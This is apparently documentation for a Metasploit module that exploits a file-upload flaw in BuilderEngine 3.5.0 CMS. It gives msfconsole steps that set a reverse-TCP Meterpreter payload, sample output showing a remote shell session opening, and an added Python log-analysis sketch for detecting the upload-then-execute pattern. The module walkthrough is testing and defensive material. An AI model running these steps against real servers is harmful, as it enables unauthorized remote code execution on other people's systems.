BuilderEngine is an open source Content Management System (CMS) that includes blog, eCommerce, and
booking modules, among others. A vulnerability was found in the jQuery upload plugin that could be
abused to upload a malicious file, resulting in arbitrary remote code execution in the context of
the web server.

## Vulnerable Application

According to the public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.

A vulnerable copy was collected by Exploit-DB, which can be downloaded here:

https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip

Another way to test this exploit is by using the Sedna image:

https://www.vulnhub.com/entry/hackfest2016-sedna,181/#

## Verification Steps

To see if the service is running BuilderEngine, you may use the check command from the module.
If the resource is found, then you may see the following output:

```
msf exploit(builderengine_upload_exec) > check
[*] 192.168.1.123:80 The target appears to be vulnerable.
```

Knowing that the ```jquery-file-upload``` plugin is available, you can try the exploit by following
these steps:

1. In msfconsole, do ```use exploit/multi/http/builderengine_upload_exec```
2. ```set RHOST [Target IP]```
3. ```set PAYLOAD php/meterpreter/reverse_tcp```
4. ```set LHOST [Your IP]```
5. ```exploit```

If exploited successfully, you should see output similar to the following:

```
msf exploit(builderengine_upload_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[+] Our payload is at: RnrXvNHDaQA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.123
[*] Meterpreter session 3 opened (192.168.1.1:4444 -> 192.168.1.123:51354) at 2017-05-16 14:44:14 -0500
[+] Deleted RnrXvNHDaQA.php

meterpreter > 
```
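
From the defender's side, the run above leaves a recognizable pattern in web server access logs: an upload request to the ```jquery-file-upload``` plugin followed shortly by a request for a ```.php``` file from the same client. The following detection sketch is an added example, not part of the module or of BuilderEngine; it assumes combined-format access logs, and the URL paths, the 60-second window, and the sample log lines are constructed placeholders.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache/nginx "combined" format. The URL paths are
# placeholders, not BuilderEngine's real directory layout.
SAMPLE_LOG = """\
192.168.1.1 - - [16/May/2017:14:44:13 -0500] "POST /PLACEHOLDER/jquery-file-upload/handler HTTP/1.1" 200 312 "-" "-"
192.168.1.1 - - [16/May/2017:14:44:14 -0500] "GET /PLACEHOLDER/files/RnrXvNHDaQA.php HTTP/1.1" 200 0 "-" "-"
192.168.1.50 - - [16/May/2017:14:45:02 -0500] "POST /PLACEHOLDER/jquery-file-upload/handler HTTP/1.1" 200 298 "-" "-"
192.168.1.50 - - [16/May/2017:14:45:03 -0500] "GET /PLACEHOLDER/files/photo.jpg HTTP/1.1" 200 48211 "-" "-"
192.168.1.77 - - [16/May/2017:14:50:00 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "-"
"""

UPLOAD_MARKER = "jquery-file-upload"  # plugin name as given on this page
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_upload_then_exec(log_text, window=timedelta(seconds=60)):
    """Return (ip, path, status) for .php requests that follow a successful
    upload POST from the same client within `window`."""
    last_upload = {}  # client IP -> time of its most recent 2xx upload POST
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0].lower()  # ignore query string and case
        if m["method"] == "POST" and UPLOAD_MARKER in path:
            if m["status"].startswith("2"):
                last_upload[m["ip"]] = ts
        elif path.endswith(".php") and m["ip"] in last_upload:
            if timedelta(0) <= ts - last_upload[m["ip"]] <= window:
                hits.append((m["ip"], m["path"], m["status"]))
    return hits

if __name__ == "__main__":
    for ip, path, status in find_upload_then_exec(SAMPLE_LOG):
        print(f"ALERT {ip} requested {path} ({status}) right after an upload")
```

As the run above shows, the uploaded file is deleted after the session opens, so it may no longer be on disk when the alert is investigated.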
